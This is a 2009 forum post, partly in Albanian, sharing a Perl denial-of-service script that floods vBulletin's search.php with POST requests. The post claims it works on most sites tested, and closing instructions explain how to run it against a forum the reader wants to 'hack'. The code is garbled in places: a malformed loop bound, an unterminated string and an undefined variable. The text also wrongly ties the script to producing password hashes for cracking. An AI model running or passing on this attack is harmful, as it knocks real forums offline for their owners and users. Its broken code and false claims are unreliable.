HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 

 vBulletiin All Version

Go down 

Posts : 35
Join date : 2009-05-28

PostSubject: vBulletiin All Version   Thu May 28, 2009 11:27 am

VBulletin DoS Exploit


#Exploit eshte testuar ne 15 faqe dhe ne 13 ka funksionuar. 98% Works


# important => Make sure that Image Verification in (search.php) is NOT Enabled.

# It works on 3.6.5 and prior [all] !


#Perl Script

use Socket;

if (@ARGV < 2) { &usage; }


$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<99999999999999999999999999999999999999999999999 99999999999999999999999; $i++)



$data = "s=&do=process&query=$user&titleonly=0&starter only =0&exactname=1&replyless=0&replylimit=3&searchdat e =1&beforeafter=before&sortby=title&order=descendi n g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";

$len = length $data;

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".

"Accept: */*\r\n".

"Accept-Language: en-gb\r\n".

"Content-Type: application/x-www-form-urlencoded\r\n".

"Accept-Encoding: gzip, deflate\r\n".

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

"Host: $host\r\n".

"Content-Length: $len\r\n".

"Connection: Keep-Alive\r\n".

"Cache-Control: no-cache\r\n\r\n".


my $port = "80";

my $proto = getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

send(SOCKET,"$foo", 0);

syswrite STDOUT, "|";


print "\n\n";

system('ping $host');

sub usage {

print "\tusage: \n";

print "\t$0 \n";

print "\tex: $0 /forum/\n";

print "\tex2: $0 / (if there isn't a dir)\n\n";



kete script e merrni e bani copy paste ne notepad edhe e runi si emri.pl tai shkon start run e shkruni cmd tani ku e keni rujt pershembell nese e keni rujt te fajllat ne perl bin shkoni kshtu cd C:\perl\bin tani ju hapet perl bin edhe e shkruni emrin e perlit qe ja keni lan psh emri.pl www.test.com aty te test e shkruni webin a po forumin qe doni me hakirat dhe tani jav qet ni hash code per me zberthy hash code shkoni tek www.gdataonline.com dhe tani vazhdoni me hapat tjer tung nga trigoni
Back to top Go down
View user profile http://delax.board-directory.net
vBulletiin All Version
Back to top 
Page 1 of 1
 Similar topics
» Oh why do I ... [version 2, go!]
» Guide: Running Uranium 4.0 (Windows-version) on MacOSX
» [Debate] Which Version of Sailor Moon is the Best?
» Let's Play Pokemon Sweet Version?

Permissions in this forum:You cannot reply to topics in this forum
 :: Delax Box :: Exploit-
Jump to: